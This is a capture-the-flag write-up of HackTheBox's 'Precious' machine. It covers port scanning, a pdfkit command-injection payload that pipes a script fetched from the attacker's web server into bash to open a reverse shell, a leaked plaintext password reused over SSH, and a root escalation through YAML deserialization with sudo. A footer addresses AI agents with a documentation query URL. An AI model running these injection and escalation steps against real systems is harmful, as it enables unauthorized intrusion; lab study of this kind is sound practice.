# Precious Precious is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/Precious) created by Nauten. This machine is straightforward and does not have any rabbit hole or hard-to-find information, but still, you need to do good research because the exploit is a little uncommon. In the current post, my IP is 10.10.14.76, and the target’s IP is 10.129.49.93 ### Gather Information This step is always the same, you have to ping the machine to see if is alive, and then use Nmap to scan all the ports to avoid surprises. {% code title="Local Terminal" %} ```bash ping -c 1 10.129.49.93 ``` {% endcode %}

Ping’s output, by the TTL around 64, is a Linux Machine

{% code title="Local Terminal" %} ```bash nmap -p- –open -T5 -v -n 10.129.49.93 ``` {% endcode %}

{% code title="Local Terminal" %} ```bash nmap -sC -sV -p 22,80 10.129.49.93 ``` {% endcode %}

At this point, we know that is only a website, but we still need more details before trying anything. {% code title="Local Terminal" %} ```bash whatweb http://10.129.49.93 ``` {% endcode %}

Relevant information {Domain = precious.htb}

Add that domain to your file /etc/hosts * Browser:

There is nothing special about this site, one of the best options, before interacting with the “Web Page to PDF” is using wfuzz {% code title="Local Terminal" %} ```bash wfuzz -c -t 200 –hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.219.49.93/FUZZ ``` {% endcode %} Spoiler, no results. * Browser: Submit ****

Ok, nothing happens with the own URL, let’s open a simple http.server using python to see how the site react to it, the result does not change if you use the command without an index.html file. {% code title="Local Terminal" %} ```bash python3 -m http.server 80 ``` {% endcode %} * BrowserSubmit:

Content from index.html... as a .pdf file.

The output is a simple pdf file, nothing suspicious and with using only the textbox there is no way to get a response from bash commands, let’s check the metadata. {% code title="Local Terminal" %} ```bash exiftool output.pdf ``` {% endcode %}

output from exiftool, nothing suspicious

### Weaponization and Exploitation If you search for “pdfkit v0.8.6 exploit” you will find a critical command injection exploit. We will use that to get access to the machine. ()

Exploit structure from the code, by security.snyk

As we can see, we only have to change the content from **params\[:name]** from the url to execute a command, to test if this definitely works, you have to open a local terminal and write **tcpdump -i eth0 icmp** (To check your interface, use ifconfig) and submit at the browser ** -c 1 10.10.14.76 | bash\`’}**. After the test, now we know that is working and we can create a reverse shell, for this, we need two local terminals and one index.html file with a bash command inside. {% code title="Local Terminal 1" %} ```bash vi index.html python3 -m http.server 80 ``` {% endcode %}

{% code title="Local Terminal 2" %} ```bash nc -nlvp 443 ``` {% endcode %} * BrowserSubmit: 10.10.14.76 | bash\`’}

You can close your LocalTerm1 and the LocalTerm2 now is the target command prompt called “Target”. After this, a good practice is to make a [bash treatment](/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade.md).

Target folder exploration, searching for user.txt

Looks like only Henry can open the user flag, we need to gain his privileges, and for that we need to find any important file that could contain his credentials, like configs. So, our best option at this moment, is to return to home and check if our account, user ruby, has something in the personal folder. At first glance it shows that there is nothing there, but if you show hidden files you can see more stuff. {% code title="Target Terminal" %} ```bash cd /home/ ls -l ./ruby ls -la ./ruby ``` {% endcode %}

But there are many folders… {% code title="Target Terminal" %} ```bash find -name “*config*” ``` {% endcode %}

Search for every config file inside folder ruby, usual location of credentials.

{% code title="Target Terminal" %} ```bash cat ./ruby/.bundle/config ``` {% endcode %}

Content of .bundle/config file, Henry’s password.

Our best option now, is to open a new LocalTerm and try to login using ssh with these credentials {henry\@Q3c1AqGHtoI0aXAYFH} {% code title="Local Terminal" %} ```bash ssh henry@10.129.49.93 ``` {% endcode %}

We are in, now your LocalTerm is **Henry**, let’s go to his folder and open the file user.txt {% code title="Target Terminal - Henry" %} ```bash cd /home/henry cat user.txt ``` {% endcode %}

### Privileges Scalation {% code title="Target Terminal - Henry" %} ```bash cd /root/ ``` {% endcode %}

Now we need to get the credentials of root. {% code title="Target Terminal - Henry" %} ```bash sudo -l ``` {% endcode %}

Looks like as Henry, we can execute that “rb” file as the user Root without password {% code title="Target Terminal - Henry" %} ```bash cat /opt/update_dependencies.rb ``` {% endcode %}

At first glance, we can see that read a file called “dependencies.yml”, we can use that for us. {% code title="Target Terminal - Henry" %} ```bash find -name “dependencies.yml” cat ./sample/dependencies.yml ``` {% endcode %}

Nothing important in the content, but there is an exploit called **Yaml Deserialization** (It took me a lot of time to find it), that can be used here, by creating a new dependencies.yml file with [this code](https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml), remember to create the new dependencies.yml at Henry’s folder because there you have writing permission.

{% code title="Target Terminal - Henry" %} ```bash sudo /usr/bin/ruby /opt/update_dependencies.rb ``` {% endcode %} Now we have to make a modification at the dependencies.yml file and then run again the previous command.

{% code title="Target Terminal - Henry" %} ```bash sudo /usr/bin/ruby /opt/update_dependencies.rb /bin/bash -p ``` {% endcode %} After executing again the command, we change from Henry to **Root**, now we have the permission to read the /root/ folder {% code title="Target Root" %} ```bash cd /root/ ``` {% endcode %} {% code title="Target Root" %} ```bash cat root.txt ``` {% endcode %}

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://robertos-notebook.gitbook.io/cybersecurity/hack-the-box/old-machines/easy-machine/precious.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.